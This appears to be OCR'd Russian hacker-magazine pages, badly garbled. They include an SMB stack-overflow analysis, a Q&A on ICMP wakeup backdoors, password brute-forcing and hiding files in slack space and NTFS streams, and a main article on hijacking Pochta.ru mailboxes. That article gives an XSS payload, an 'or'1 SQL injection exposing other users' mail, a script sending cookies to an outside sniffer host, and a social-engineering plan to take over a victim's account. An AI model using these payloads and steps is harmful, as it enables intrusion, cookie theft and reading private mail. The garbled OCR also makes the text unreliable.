тного хакера Н Э Мооге'а: Іізіз.ітппипііузес. 
сот/рірегтаіІ/баі1ѵбаѵе/2006-Аиаиз1/003400. 
Ьіті, а в М8ЭІМ можно найти готовый при- 
мер реализации ВІоосІІіоипсГа Рагзег ОН 
іог 8МВ Ретоіе АРІз, расположенный в 
файле РЕМАРІ.С и основанный на функции 
СгеаіеРгоіосоІ(), описанной в ѵѵіпсіоѵѵззсік. 
тзс!п.тісгозоЙ.сот/еп-из/ІіЬгагѵ/тз707941 . 
азрх . Основная ценность РЕМАРІ.С заключа- 



ется в том, что имена І_*() функций (совпадаю- 
щих с именами команд 8МВ-протокола) в нем 
перечислены «прямым текстом». Фактичес- 
ки, это единственный источник информации, 
который у нас есть. 

Просматриваясписокперекрестныхссылок, 
необходимо отобрать функции, присутству- 
ющие в файле РЕМАРІ.С: І_І\ІеіРаіНТуре(), І_ 
МеіІ\ІатеѴаІісІаіе(),І_І\Іеі[\ІатеСапопісаІІ 2 е(), 
І_І\ІеіМатеСотраге() и І_ЫеіРа1:ІіСотраге(). 
Теперь необходимо проанализировать 
дизассемблерный листинг каждой из них 
и найти хотя бы одну функцию, переда- 
ющую ЫеірІзРетоіе() свой собственный 
аргумент вместе с указателем на локаль- 
ный буфер фиксированного размера. Как 
ни смешно, но этой функцией оказывает- 
ся... І_МеіІ\ІатеСапопісаІІ 2 :е(). Нет, это не 
ошибка! І_Ме{І\ІатеСапопісаІІ 2 е() вызывает 
ЫеірІзРетоіеО, а І\ІеірІзРетоіе() вызывает 
І_[\ІеіІ\ІатеСапопісаІІ 2 е(). Вот такая, значит, 
рекурсия у нас получается. Но довольно 
эмоций! Ниже приведен дизассемблерный 
фрагмент І_МеіМатеСапопісаІІ 2 е(), в кото- 
ром и происходит переполнение. 

Вот где происходит переполнение 

ІИіАйИИ 

НН ; 

Іеа еах,[еЬр+ѵаг_230] 

; указатель на... 

ризіп еах ; ...локальный буфер. 

Іеа еах,[еЬр+ѵаг_20] 

; указатель на другой . . . 

№■■ еах ; ...локальный буфер 



рІізЫ 

; вызов уязвимой функции 
саІІ ІЧеІрІзНетоІе 

Таким образом, все, что нам нужно, — это 
вызвать функцию І_МеіМатеСапопісаІІ 2 е(), 
также являющуюся командой протокола 
8МВ, и передать ей слишком длинную строку, 
вызывающую срыв стека, что легко осущест- 
вляется из любой точки сети, если, конечно, 
внешний 8МВ-трафик не отсекается бранд- 
мауэром. 

Проблема в том, что І_І\ІеіІ\ІатеСапопісаІІ 2 е() 
не документирована, и ее прототип неизвес- 
тен. Кое-какую информацию удается нарыть 
в файле пеіарі32.іпс, входящем в состав ас- 
семблера МА8М. 

ЦЧеІМатеСапопісаІіге РНОТО :ОѴѴОРЮ,:ОѴѴОРЮ,: 
БѴѴО Н О , : О ѴѴО Н Б , : БѴѴО Н О , : БѴѴО Н О 

К счастью, у нас есть ВІоосІІіоипб Рагзег, 
заботливо предоставленный МісгозоЙ, 
позволяющий снифить сеть и декодиро- 
вать пролетающие ЗМВ-команды. Аргу- 
менты, правда, не декодируются, но об их 
назначении нетрудно догадаться самосто- 
ятельно. Еще можно дизассемблировать 
І_І\ІеіІ\ІатеСапопісаІІ 2 е(), разобравшись, 
какие аргументы она ожидает. Это рутинная 
и неинтересная работа, ктомужеуже проде- 
ланная авторами теіазріоіі ехріоіі'а, так что 
не будем повторяться, а лучше позаимству- 
ем готовый «движок» и адаптируем его для 
собственных нужд. ПС 
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О: Часто на зесигііу-сайтах встречаю 
такие сокращения, как РоС и ВоГ. Что 
они обозначают и как расшифровыва- 
ются? 

А: Сокращение РоС (от англ. РгооІ оі Сопсері 
— доказательство концепции, решение или 
демонстрационный пример) — используется 
чаще всего в среде специалистов по безопас- 
ности вместо термина «эксплоит». Сообщения 
о найденных уязвимостях распространяются 
в двух видах: «РгооІ оі Сопсері ТЬеогу» (дока- 
зательство уязвимости в теории) и «РгооІ оі 
Сопсері Сосіе» (доказательство уязвимости 
в виде реализующего ее использования про- 
граммного кода). Под эксплоитом, как правило, 
понимают последнее. 

Сокращением ВоР (от англ. ЬиІІег оѵегііоѵѵ) при- 
нято обозначать переполнение буфера. 



О: Что такое ѵѵакеир-бекдор и как он 
работает? 

А:ѴѴакеир-бекдор, какследуетизсамого назва- 
ния, — это бекдор, который нужно будить, чтобы 
он начал работать. Используется эта техноло- 
гия исключительно для того, чтобы скрыть при- 
сутствие бекдора в системе (отутилиты пеізіаі и 
сканера портов). Основана данная технология 
на особенности протокола ІСМР, который, как 
известно, совсем не использует сетевые пор- 
ты, а любые істр-сообщения отправляются і 
принимаются ІР-подсистемой. После своего 
запуска ѵѵакеир-бекдор создает ВАѴѴ-сокет 
для работы по протоколу ІСМР и, не открывая! 
порта, ждет специального істр-пакета. После 
получения ѵѵакеир-пакета бекдор беретуказан- 
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тіый в нем номер порта и создает уже обычньи 
ТСР или ІЮР-сокет и начинает прослушиваті 
порт на входящие соединения. После принятия 
и закрытия сессии порт закрывается, и бекдор 
снова становиться невидимым для сканера 
портов и утилиты пеізіаі. Так как ѵѵакеир-бекдор 
создает ВАѴѴ-сокет, то для его запуска нужны 
права гооі. Разумеется, кроме прямого соеди- 
нения (сіігесі:), которое я описал, ѵѵакеир-бек- 
дор может быть выполнен с использованием 
обратного соединения (соппесі Ьаск), то есть 
после получения ѵѵакеир-пакета бекдор не от- 
крывает ТСР- или ІЮР-порт, а самостоятель- 
но соединяется по указанному в присланном 
пакете адресу. 

Для посылки ѵѵакеир-пакета, как правило, ис- 
пользуется отдельная утилита (істрзепб), но 
некоторые ѵѵакеир-бекдоры для пробуждения 
задействуют утилиту ріпд с опцией -р, которая 
позволяет посылать данные. 

Множество исходников ѵѵакеир-бекдоров с 
утилитой істрзепб можно найти в архиве от 
известной русской команды блек-хетов т00 по 
адресу: ИДр://т00.ЫаскИа1.ги/т00-агсИіѵеТаг. 

Ьт.2 (в нем смотри ЬсІраскТаг.аг) 

О: Многие хакерские софтины требуют 
установки библиотек ІіЬрсар или ІіЬпеі. 
Для чего нужны эти библиотеки? 

А: Многие известные утилиты, такие как птар, 
ІсрсІитр,Зпоі1ипр. задействуют одну или сразу 
обе названные библиотеки. Библиотека ІіЬпеі 



(ѵѵѵѵѵѵ.ісрбитр.ога) предназначена для обратного 
действия — извлечения пакетов из сети и их анализа. 
Программист может в одной программе задейство- 
вать сразу обе эти библиотеки. 



О: Я использую для перебора паролей 
программу Вгиіиз. Программа простая 
в использовании, только я до сих пор 
не знаю, что в ней означает опция Кеер- 
АІіѵе? 

А: Кеер-АІіѵе — это не просто опция брутфорсе- 
ра, а механизм ТСР, позволяющий серверным 
приложениям неограниченно долго сохранять 
соединения с клиентом. Особое значение это 
имеет при работе с ѵѵѵѵѵѵ-серверами. Как пра- 
I вило, по умолчанию ѵѵѵѵѵѵ-сервер отправляет 
I ответ на запрос и тут же разрывает соедине- 
ние, при этом в заголовке НТТР-ответа обычно 
присутствует такая строка: «Соппесііоп: сіозе». 
Сто удобно при просмотре страниц с помощью 
браузера, но для брутфорса, как ты понима- 
ешь, разрыв соединения после каждого запро- 
са снижает скорость перебора. Согласно РРС 
2068, можно в НТТР-запросе указать серверу, 
чтобы он включил механизм Кеер-АІіѵе, то есть 
не разрывал соединение после каждого запро- 
са. Для этого в запрос нужно добавить строку 
«Соппесііоп: Кеер-АІіѵе» (видимо, это и делает 
ВшШз при установленной опции КеерАІіѵе). 
Ниже показан пример такого запроса к моему 
локальному ѵѵѵѵѵѵ-серверу АрасЬе при помощи 
Іеіпеі: 







(ЗЕТ /НТТР/1 .1 
Щі: 127 .0.0.1 
Соппесйоп: Кеер-АІіѵе 

Если сервер поддерживает механизм Кеер- 
АІіѵе, то в заголовке НТТР-ответа будут присутс- 
твовать примерно такие строки: 

НТТР/1. 1 200 ОК 

Кеер-АІІѵе: іітеоиі=15, тах=100 
Соппесііоп: Кеер-АІіѵе 

Параметр іітеоиІ=15 означает, что соедине- 
ние будет удерживаться в течение 15 секунд, 
и если клиент не проявит никакой активности 
в течение этого времени, то соединение будет 
разорвано сервером. Параметр тах означа- 
ет, что временной промежуток можетбыть уве- 
личен до 100 секунд. 

К сожалению, у большинства ѵѵѵѵѵѵ-серверов в 
интернете отключен механизм Кеер-АІіѵе, поэ- 
тому не стои т на него сильно рассчитывать. 



го модуля. Ты также можешь просто удалить 
файл командой гпл, а затем восстановить его 
утилитой е2ипбеІ ( НДр://е2ипбеІ.зоигсеіогае. 
пеО . но в этом случае не гарантируется восста- 
новление. Поэтому я тебе лучше всего советую 
воспользоваться утилитой Ьтар (ищи ее на 
ННрѴ/раскеізіогтзесигііѵ.огд Т которая позво- 



С:>зіагіс:\Ьаг.М:ЬідІіІе.ехе 

Забавно, что штатными средствами ѴѴіпсіоѵѵз 
определить наличие альтернативных пото- 
ков в системе невозможно. Для этого нужны 
сторонние утилиты, например абз_са1 ( ѵѵѵѵѵѵ. 



О: Долгое время не существовало ника 
кой защиты от переполнения буфера в 
куче, что-то изменилось в наше время? 

А: Действительно, с давних времен разработа- 
но большое количество защит от переполнений 
буферов в стеке, уязвимости форматной стро- 
ки и прочих ошибок. Например, такие системы, 
какЗіаскОиагсІ, ЗіаскЗНіеІсі, РгоРоІісе, ОрепѵѵаІІ 
(ОѴѴІ_), ЫІозаІе защищают от переполнений бу- 
фера в стеке. РоіпЮиагсі защищает от пере- 
записи указателей на функции. ЕогтаіѲиагсі 
защищает от уязвимостей форматной строки. 
РасеСиагсі защищает от гасе-сопбШопз. От- 
сутствовала только защита от переполнения 
буфера в Неар. Но инженерная мысль не стоит 
на месте, и такая защита уже существует! На- 
пример, по этому урлу можно узнать подроб- 
ности и скачать реализацию Неар ргоіесііоп 
для І_іпих: ѵѵѵѵѵѵ.сз.исзЬ.есІи/~ѵѵкг/ргоіес1з/Ііеар 
ргоіесііоп/ 

В 8Р2 для ѴѴіпбоѵѵз ХР также включена защита 
от переполнения буфера в куче. 

О: Как лучше спрятать свой файл в 
Ыпих? 

А: Не буду тебе советовать глупостей, вроде 
«переименовать файл во что-то неприглядное 
и поместить в самый неприметный каталог» . Ко-| 
нечно, ты можешь воспользоваться специаль- 
ным модулем ядра (І_КМ) для сокрытия файлов, 
которые входятвсоставбольшинстваруткитов, 
Ь в этом случае встает вопрос сокрытия само- 



ляет прятать данные в «слабые места»: файло- 
вой системы ех12 или ехІЗ. При этом скрытые 
данные будут абсолютно невидимы в системе, 
нисколько не уменьшая место на диске, и не 
будут обнаруживаться утилитами проверки це- 
лостности файлов, использующими алгоритмі 
вычисления контрольной суммы файла (СРС) 
Немного поясню, что такое «слабые места: 
Файловая система адресует части дисковод 
пространства, называемые блоками. Обычно 
размер блока для файловой системы ех12/ехІЗ 
равен 1 , 2 или 4 Кб. Если размер файла меньше, 
чем размер блока, то оставшееся пространство 
потрачено впустую. Это и называется «слабым 
местом». Например, следующая команда запи- 
сывает файл Тііе.ѣхѣ в «слабое место», создан- 
ное файлом /еіс/раззѵѵб: 

# саі ЯІе.МІЬтар -тосіе риізіаск/еіс/раззѵѵсі 
А команда 

# Ьтар --тосіе зіаск /еІс/разз\л/сЫіІе2.М 
извлекает спрятанные данные в файл Пе2.М 
Для затирания (удаления информации) из «сла- 
бого места» используется команда: 

# Ьтар --тосіе ѵѵірезіаск/еіс/раззѵѵсі 

Зое подробности смотри в тап Ьтар. 

О: А как спрятать файл в ѴѴіпсІоѵѵ$? 

А: В связи с тем, что сейчас повсеместно ис- 
пользуются системы ѴѴіпбоѵѵз, работающие 
на файловой системе ІЧТЕЗ, среди хакеров и 
вирусописателей стало модно прятать данные 
в так называемые альтернативные потоки дан- 
Іных АЭЗ (АІІегпайѵе Эаіа Зігеатз). Такие потоки 
можно создавать не только внутри любого фай- 
па в ІЧТЕЗ, но и даже в каталоге, при этом дан- 
ные, сохраненные в потоках, будут абсолютно 
невидимы в системе, хотя и будут уменьшать 
общее место на диске. Формат альтернативных 
потоков данных имеет следующий вид: 
/імя_файла:имя_потока:атрибут. 

Атрибут является необязательным. 

Например, вот так можно скопировать файл 
іли содержимое любого существующего фай- 
і іа в альтернативный поток: 

|Ь:>іуре Ыдйіе.ехе >> Ьаг.іхЬЬідЯІе.ехе 
В результате выполнения данной команды 
файл ЬідТМе.ехе будет прикреплен к Ьаг.М в ка- 
честве потока. 

Запустить Ьідіііе.ехе на выполнение прямо из 
потока можно следующей командой: 



зесипЫосиз.сот/1ооІз/1 81 4) . Эта программа 
может не только обнаруживать, но и удалять 
альтернативные потоки. 

Больше информации по альтернативным пото- 
кам данных ІЧТЕЗ ты можешь получить в моей 
книге «Головоломки для хакера» (ищи ее в 
книжных магазинах). 



О: Как установить 8оііІсе под ѴМѵѵаге? 

А: В целом установка отладчика в ѴМѵѵаге 
осуществляется точно так же, как и в обычной 
системе. До начала установки в ѴМѵѵаге лучше 
выполнить: Еііе -> ІпзІаІІ ѴМѵѵаге Тооіз. Однако 
юсле установки могут начаться проблемы, на- 
пример, комбинация СігІ+Э может «подвеши- 
вать» виртуальную систему. При установке Эгіѵег 
ЗШбіо в каталоге ЮгіѵегЗШбіо\Воокз\ размеща- 
ется документ ІІзіпд ЗойІСЕ.рбГ В нем целый 
раздел посвящен установке Зойісе под ѴМѵѵаге: 
I <Аррепбіх Е. ЗойІСЕ апб ѴМѵѵаге» . Чтобы Зойісе в 
зиртуал ьной машине работал стабильно, в « ІІзіпд 
ЗоЙІСЕ» рекомендуется в файл с расширением 
.ѵтх виртуальной машины добавить следующие 
две строчки: 

ѵттоизе.ргезепі= «РАІ_5Е" 
зѵда.тахЕиІІзсгеепВеІгезГГПск = «2" 

Обычно этого достаточно для успешной 



-л о і о раоші/іропі^ісіѵі 

ины добавить следующие 

I 

ГіТіск = «2" 

іно для успешной работы. 

х анонимных прокси 



О: Часто в списках анонимных і 
встречаю §ОСК§ 4 и 5 версии? В чем от- 
личие между этими версиями? Какую 
версию лучше использовать? 

А: Запомни главные отличия 30СК35 от 4 
версии: поддержка аутентификации пользо- 
вателей, возможность работы с ІЮР- и ІСМР- 
протоколами и способность 30СК35-сервера 
выполнять разрешение имен хостов. 

[Таким образом, если тебе нужно работать по 
ІЮР-протоколу или с программами, использу- 
ющими ІСМР-протокол типа ріпд и Ігасегоиіе, 
то выбирай исключительно 30СК35 (через 
ЗОСК54 можно работать только по ТСР-прото- 
колу). Также 30СК35 обеспечивает поддержку 
нескольких различных способов аутентифи- 
кации пользователей, но в случае анонимных 
прокси аутентификация обычно отключена. 
Способность к разрешению имен хостов озна- 
чает, что вместо ІР-адреса можно использовать 
имя хоста, а ЗОСКЗб-сервер сам произведет 
трансляцию. 

30СК35 описан в РЕС 1 928 (в инете можно най- 
ти перевод на русский). Для 30СК34 РЕС от- 
сутствует, но большая часть положений из РЕС 
1 928 справедлива и для четвертой версии, цс 
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Щ Как угнать 
почтовый ящик 



ПОЧТОВЫЕ ДЫРЫ В РОСНТА.КО 



НЕРЕДКО У ХАКЕРА ВОЗНИКАЕТ ЖЕЛАНИЕ ПРОЧИТАТЬ ЧУЖУЮ ПОЧТУ. БУДЬ ТО МЫЛ ЬНИК ЛЮБИМОЙ ДЕВУШКИ ИЛИ 
ЗЛЕЙШЕГО ВРАГА. ПРИ ЭТОМ ВЗЛОМЩИК ПРИМЕНЯЕТ ВСЯЧЕСКИЕ УХИЩРЕНИЯ: ПЕРЕБОР ПАРОЛЕЙ, ПРОТРОЯНИВАНИЕ 

ЖЕРТВЫ И Т.П. НО ДАННЫЕ ПРИЕМЫ НЕ ОСОБО ЭФФЕКТИВНЫ И РЕДКО ДАЮТ ПОЛОЖИТЕЛЬНЫЙ РЕЗУЛЬТАТ. СЕЙЧАС 

МЫ ПРОТЕСТИРУЕМ НА ПРОЧНОСТЬ ПОЧТОВУЮ СИСТЕМУ РОСНТА.ВЫ, А НАЙДЕННЫЕ ДЫРКИ В СКРИПТАХ ПОМОГУТ НАМ 
ЛЕГКО И БЫСТРО ПОПАСТЬ В ЖЕЛАЕМЫЙ ПОЧТОВЫЙ ЯЩИК. 



днажды один мой знакомый по- 
интересовался у меня, возможно 
ли получить доступ к почтовому 
ящику, прописанному на Почте. ру. Я об уяз- 
вимостях этого сервиса на тот момент ниче- 
го не знал и поэтому решил посмотреть, что 
там к чему. Зайдя на главную страницу, я тут 
же заметил первый глюк — счетчик, показы- 
вающий количество принятых за день писем 
был нулевым, в то время как отправленных 
писем было более десяти тысяч. Зарегист- 
рировав себе ящик, я убедился, что это был 
не глюк системы подсчета пересылаемых 
писем — просто-напросто письма в тот день 
на Почту. ру вообще не доходили. То же са- 
мое я увидел и на следующий день. К чему 
я клоню? Просто хочу намекнуть тебе не ис- 
пользовать данную почтовую службу для пе- 
ресылки почты стратегической важности. 
Впрочем, перейдем к делу. Я знал, что чело- 



век, в ящик которого нужно было попасть, 
использует веб-интерфейс для входа, и весь- 
ма высока вероятность того, что исполнение 
Іаѵазсгірі'ов в его браузере разрешено. По- 
нятное дело, разумным будет тогда попро- 
бовать найти ХЗЗ на сайте и угнать его куки. 
Решив взглянуть на содержимое соокіез, 
которые передает сайт, я обнаружил, что по 
умолчанию куки не приходят — нужно при вхо- 
де в ящик разрешить прием плюшек. Повто- 
рив вход таким образом, я обнаружил целых 
четыре печенюшки, залетевшие мне на комп. 
Их содержимое меня, в принципе, мало инте- 
ресовало. По названиям было видно, что там 
находятся зашифрованные логин и пароль — 
в общем, все, что нужно для быстрого входа в 
ящик. Срок их действия составляет аж целый 
год. Конечно, далеко не каждый пользователь 
использует подобный способ аутентифика- 
ции, но все же стоило попробовать. 



О Баг 1 . Х35 

Осмотрев свой почтовый ящик, я принял- 
ся экспериментировать с ним, разыскивая 
ХЗЗ. Разыскивать долго не пришлось, точ- 
нее не пришлось совсем. Представь мое 
удивление, когда я обнаружил баг уже с 
первой попытки! Уязвимым оказался сце- 
нарий таіІЬох.рИр, служащий для переме- 
щений по папкам почтового ящика. Данному 
скрипту передается параметр таіІЬ, кото- 
рый содержит название папки, в которую 
необходимо осуществить переход. Если 
подставить в этот параметр значение, не 
совпадающее с имеющейся в данном ящике 
папкой, то получаем переход на несущест- 
вующую папку, название которой попадает 
в ИітІ-код страницы. Вставив небольшой 
кусочек іаѵазсгірГкода в качестве значе- 
ния таіІЬ, я увидел в выскочившем окошке 
содержимое своих кукисов: 
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КАК УГНАТЬ ПОЧТОВЫЙ ЯЩИК 





РМОТД через ГКШШЫЕ КПНЕКТЬР 

@М ЫОВДТ* ін^та ъищ-.п ^ц, г о5иу*м пімтшй клиент, 
подцержиы о-с в РС І> ЗмТР, НАР, ЗНГГР 




теопрлнимрннывяшиь 

ВЫ еаии дпрвдуіРрттд размер сгсюпэ петоі-ОГФ ящика. Ниіакил 
ограничений! 

* Ь &ГТ4І шітеіііст чнез гжѵ, «рн 54№ 

йМг ттеч. паггп»» і*іэ?-*с гиссч 




> Первая ХЗЗ. И это только начало! 



Щ1р://\л/\л/\л/9. росіпіа. ш/таіІЬох. рГір?ісІ = МсІс4с5| 
>аІегі(Роситепіхоокіе)</5сгір1>ИяИДИДІ 



Но, как ты уже сам видишь, кроме этого, 
скрипту также передается параметр ісі, содер- 
жащий идентификатор сессии пользователя. 
Данный параметр, создаваемый при входе в 
ящик, уникален для каждого входа, и узнать, 
каким он должен быть у человека, который 
получит ссылку, отправленную ХЗЗ, попросту 
невозможно. Понимая это, я принялся искать 
брешь там, где данный идентификатор не 
используется, то есть за пределами ящика. 
Но, как и следовало ожидать, ничего не на- 
шел. Возникло предположение, что именно 
наличием параметра ісі руководствовались 
программисты, создавшие скрипт, совер- 
шенно не фильтрующий ввод (могли бы хоть 
спецсимволы запретить). Как оказалось, они 
просто чего-то не доделали. 

О Баг 2. $ОЫпі 

Если сценарий никак не фильтрует ввод, то 
и сам параметр ісі может быть уязвимым. Ко- 
нечно, значения идентификаторов сессий 
хранятся в БД. Проверим на скуль-инъекцию. 
Подставив кавычку в конец идентификатора, 
я вылетел из своего ящика и затем дописал 
конструкцию вида «’ог'І =1 » (без кавычек, яс- 
ное дело): 



20еНа521оЯ лЙ 



Вот тут началось самое интересное: я оказал- 
ся в чужом ящике! Это было уже действитель- 
нозабавно. Немногопорывшисьв настройках, 
заглянув на сайт, я задался вопросом, почему 
меня перенесло именно на этот ящик? Логика 
подставленного значения параметра ісі озна- 
чает, что в теории я мог попасть на любой из 



>Мы их взломали! 

ящиков, для которых в БД хранится идентифи- 
катор сессии, то есть на любой из ящиков, ко- 
торые в это время кто-нибудь просматривает. 
Я стал различными способами видоизменять 
вышеприведенный запрос, обнаружив в ито- 
ге, что «1=1» писать не обязательно — доста- 
точно написать просто «1 » (или любое число 
>0). Кроме того, значение идентификатора 
теперь перестало иметь свой смысл, нужно 
было оставить только букву «І\І» в начале (с 
таким ісі не получалось зайти на сайт, прила- 
гаемый к данному ящику, но мне это и не было 
нужно). В итоге запрос сократился до следу- 
ющего вида: 



|ІіДр://\л/ѵѵ\л/9.росІі1а.ги/таіІЬох.рГір?ісІ=М'ог'1 



Набрав эту ссылку в адресной строке брау- 
зера, можно было сходу попасть в чей-нибудь 
ящик. И тут я понял, что с ящиком, в который 
я попадаю, все не так просто. Несколько раз 
обновив страницу в браузере, я заметил, что 
в ящике появляются новые папки, меняется 
цвет фона и т.п. Я зашел в папку «Входящие» 
и начал обновлять страницу. Тут все уже про- 
яснилось: сначала мне казалось, что я попа- 
даю в какой-то конкретный ящик, но на деле 
все оказалось так, как и диктовала логика 
запроса — мне были видны письма всех (хотя 
я в этом до конца не уверен) пользователей, 
идентифицировавшихся в системе. Причем, 
обновляя страницу, были видны последние, 
судя по дате, письма, отправляемые/получа- 
емые данной почтовой системой. Но оказа- 
лось, что прочесть удается далеко не каждое 
из них. Все это действовало, но весьма глюч- 
но. 

Теперь у меня возникло еще одно предполо- 
жение, которое не могло быть неверным: если 
я начну с таким значением ісі вносить какие- 
то изменения в настройки, создавать папки 
и т.д., то это отразится и на всех остальных 



ящиках, для которых в данный момент создан 
идентификатор сессии. Так оно и оказалось, 
и даже более того: другие пользователи во 
время моего вмешательства в работу базы 
данных идентификаторов текущих сессий 
при заходе в ящик видели примерно то же, что 
и я при входе с ісІ=І\Гог'1 . Все это происходило 
очень весело: кто-то создал папку под назва- 
нием «Кто_нибудь_знает_что_происходит» 

— и понеслись ответы-предположения. Полу- 
чился своеобразный чат, где каждый мог вы- 
разить свою мысль в названии созданной им 
папки . После многих кликов на кнопку обнов- 
ления страницы я увидел, что ящик, в который 
я попадаю, все же меняется время от времени 
на другой (по всей видимости, по истечении 
действия его ісі). 

После этого я еще несколько раз заходил на 
сайт Почты. ру с таким значением ісі в ІІВІ_. В 
итоге решил, что не нужно лишний раз палить- 
ся, ведь юзеры почты могут отписать админам, 
и эту багу залатают. А у меня уже возникла 
идея, как применить ее для решения задачи, 
которую я изначально ставил перед собой 

— захватить ящик. 

О Добываем куки 

Итак, мы имеем два уязвимых параметра в 
скрипте. Сразу приходит на ум идея проэкс- 
плуатировать их вместе: 



ІЦірѴ/мммЩэосІтіат^^ 
[здесь скрипт, угоняющий 



Отличная идея ! Такой ядовитый урл можно ки- 
нуть жертве в аську (конечно, надежно замас- 
кировав его) — и куки с почты полетят на твой 
снифер. Повозившись немного, я составил 
следующий хзз-сплоит: 



|ГіДр://\л/\л/\л/9.росГіІа.ги/таіІЬох.рІір?ісІ=М'ог'1&| 
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> На нашем диске ты 
найдешь сборник из 
полезных программ и 
скриптов, фигурирую- 
щих в данной статье. 
Также смотри увлека- 
тельный видеоролик, 
демонстрирующий 
наличие багов в сервисе 
РосНа.ги 

II 





> Логируем чужие плюшки 



таіІЬ=<бсгір1>боситепІ.ІосаІіоп="ННр://ссІ.ѵѵІіі1:еасісІ.огд/Іод. 



Здесь «Иир://ссІ.\д/ИііеасісІ.огд/Іод.рІір?1 23456» — ад- 
рес снифера (см. врезку), «%2В» — это знак « + » в игі- 
кодировке (дело в том, что скрипт перед попаданием в 
тело страницы декодируется из ІІЯІ_-кодировки, и « + » 
заменяется пробелом). Используемый скрипт далеко не 
идеален, он открывает сайт почты, а затем переносит 
на чистую страницу снифера. Как показала практика, 
обычно на это юзеры реагируют нажатием кнопки «об- 
новить» или «назад». Конечно, на загрузку сайта почты 
многие отреагируют подозрительно. С подозрением от- 
несутся и к предложению кликнуть по присланной тобою 
ссылке, даже по максимуму замаскированной. И тут мне 
вспомнилась еще одна вещь, которую я заметил рань- 
ше. Фишка в том, что если я вносил іаѵазсгірі-код в тело 
страницы: 



ИДр7^^^^осІтШш/таіІЬ^^ІіЩі^^б^с56а9І^Ш620ебс2^а5Щ0| 

бса983&таіІЬ=<зсгірЬаІеД('хбз')</бсгірЬ|Д|ДДЦВ8іІИІмЦі 



то при переходе по ссылке 



|ЬНр://ѵѵѵѵѵѵ9.росІп1:а.ги/таіІЬох.рІпр?ісІ=МсІс4с56а9І : 218620ебс21 : а5210| 
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> Совершенно чужой ящик :) 







> Меняем секретный вопрос недруга 



он вновь исполнялся, пока не был осуществлен выход из 
ящика, то есть завершение сессии. Аналогично запустив 
вышеописанный сплоит на своем компе, я мог просто пе- 
реслать ссылку 



|Гі11р://\А/ѵѵ\л/9.росІі1а.ги/таіІЬох.рІір?ісІ=М'ог'1 



вместо сплоита! Тут даже продвинутый юзер ни о чем 
не догадается, а если хоть немного владеть СИ, то и по- 
давно. 

□ Угон ящика 

После всего этого я составил план похищения ящика: 

1 . Вступить в контакт с жертвой по ісц; 

2. Заставить приемами СИ зайти жертву по ссылке 
НДр://9.росН1а.ги/таіІЬох.рІпр?ісІ=М'ог'1 . а перед этим 
самому зайти на сайт по ссылке со сплоитом; 

3. Отыскать среди кучи логов запись, принадлежащую 
жертве, не прекращая при этом общаться через аську, 
чтоб тот не успел сообразить, что его поимели; 

4. Если куки есть, то это очень круто. Осталось вставить 
их вместо собственных и зайти в ящик. Времени терять 
не стоит — нужно будет подсмотреть ответ на секрет- 
ный вопрос, который хранится в открытом виде (весьма 
часто встречающаяся недоработка создателей почто- 
вых систем, не так ли ?). Все. Остается только сменить 
пароль на почтовый ящик . 

ссі.ѵѵііііеасісі.ога — это сайт 
проекта Согптипііу соокіе 
Іоддег, представляющий со- 
бой общедоступный логгер 
запросов, аналогичный тому, 
что висит, например, на Анти- 
чате. Но в отличие от многих 
других подобных проектов каж- 
дый пользователь здесь имеет 
свой собственный уникальный 
идентификатор, для которого 
ведется отдельный лог. Доступ 
к логу закрыт паролем, поэтому 
собранная тобою инфа будет 
доступна тебе одному. В ситуа- 
ции, когда нет времени/возмож- 
ности/желания использовать 
собственный снифер, данный 
сайт сможет оказать неоцени- 
мую помощь. ПС 
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Домашний 

интернет-центр 

для Интернета 
и цифрового ТВ 
Р-660НЛ/Ѵ 



Разведение Интернета 
в домашних условиях 



Интернета в доме хватит всем. 
Настольному компьютеру в детской 
комнате,. приставке для приема 
интерактивного телевидения 
в гостиной, беспроводному ноутбуку 
в кабинете... Интернет- центры 
Р-660НТ и Р-660НТѴѴ компании 2уХЁЁ 
объединяют в сеть вою домашнюю 
компьютерную технику и с помощью 
первоклассного встроенного модема 
А0312+ подключают ее к Интернету 
на скорости, достаточной даже для 
телевидения высокой четкости, 

Н 1 Быстрая 
настройка 
■МеіГгіепсІ 



Цифровые фотографии, музыка 
и фильмы будут доступны 
в каждом уголке вашего дома г под 
надежной защитой от атак и кражи 
информации. Впервые для настройки 
безопасности и выхода в Интернет 
не нужно вдаваться в технические 
подробности или вызывать на дом 
специалиста. В любой точке России 
достаточно выбрать провайдера 
А051 и тариф из списка, а все 
остальное за вас сделает уникальная 
технология 2уХЕ1 МеіРпепсІ. 



Бесплотная горячая линия 2уХЁ!_: 
(495) &42-Н929, 0 (В№) 200-В929 
огтіпі.гудьі.гу 



я Постоянное и надежное 

АСЗЫюединение с Интернетом 
на скорости до 24 Мбит/о 
при свободном телефоне 

■ По д кл ючен и е до трех ком п ьютеров 
и ТВ-приставки с одновременным 
выходом в Интернет 

■ Полная поддержка интерактивного 
цифрового телевидения 

■ Настройка А03І_- услуг 

и безопасности домашней сети 
в считан ые минуты 

■ ѴѴі-Рі для беспроводных ноутбуке© 




* 






Рефератов 

захотелось? 




^ ГОРЯЧАЯ ЗАМЕНА РЕФЕРАТА 



СЕССИЯ И ВСЕ, ЧТО С НЕЙ СВЯЗАНО, ОЧЕНЬ НАПРЯГАЕТ. ОДИН МОЙ ЗНАКОМЫЙ, ВСЮ ВЕСНУ КЛАДУЩИЙ БОЛТ НА УЧЕБУ, 
МЕЧТАЛ НА ХАЛЯВУ СДАТЬ ЭКЗАМЕН ПО СЛОЖНОМУ ПРЕДМЕТУ. ТАКАЯ ВОЗМОЖНОСТЬ У НЕГО БЫЛА: СТОИЛО ЛИШЬ НАПИ- 
САТЬ РЕФЕРАТ НА ЛЕГКУЮ ТЕМУ «МЕТОД РЕЗОЛЮЦИИ ДЛЯ ЛОГИЧЕСКОГО ВЫВОДА В ПРОГРАММАХ НА ОСНОВЕ ФРАЗ ХОР- 
НА». УЧИТЫВАЯ, ЧТО ПРЕПОД БЫЛ НЕ ИЗ ДУРАКОВ И СЕРФИЛ ИНЕТ НА ПРЕДМЕТ СЛУЧАЙНОГО ПЛАГИАТА, У МОЕГО КОРЕША 
ПРАКТИЧЕСКИ НЕ БЫЛО ШАНСОВ ПОЛУЧИТЬ АВТОМАТ. НО ЭТО ЛИШЬ НА ПЕРВЫЙ ВЗГЛЯД. 

МОЛ ЕБНАЯ ПРОСЬБА СОКУРСНИКА ЗАКЛЮЧАЛАСЬ В ПОДМЕНЕ ОДНОГО ИЗ РЕФЕРАТОВ, А ТОЧНЕЕ ТОЛЬКО ТИТУЛЬНОГО 
